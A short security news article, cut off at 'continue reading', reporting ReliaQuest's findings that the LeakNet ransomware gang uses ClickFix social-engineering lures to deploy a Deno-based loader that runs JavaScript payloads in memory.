GoKawiilThe LeakNet ransomware gang is now using the ClickFix technique for initial access into corporate environments and deploys a malware loader based on the open-source Deno runtime for JavaScript and TypeScript.
The attacker is using the legitimate Deno to decode and execute a malicious payload directly into system memory, minimizing forensic evidence on the disk and lowering the chance of detection.
LeakNet is a relatively recent ransomware threat actor that has been active since the end of 2024. The actor averages around three victims every month, but the operation may expand with the adoption of the new tactics.
ClickFix is a widely used social engineering attack that tricks users into running malicious commands on their systems through fake prompts. The technique has been adopted by multiple ransomware groups, like Termite and Interlock.
In LeakNet’s case, the ClickFix lure leads to deploying a Deno-based loader that executes a JavaScript payload in system memory.
ClickFix lure used by LeakNet
Source: ReliaQuest
ReliaQuest calls this tactic a “bring your own runtime” (BYOR) attack, as Deno is a legitimate JavaScript/TypeScript runtime that allows JS/TS code execution outside the browser on a system.
Deno is signed and legitimate, so it bypasses blocklists and filters for unknown binary execution.
“Rather than deploying a custom malware loader that’s more likely to get flagged, the attackers install the legitimate Deno executable and use it to run malicious code,” explains ReliaQuest.
... continue reading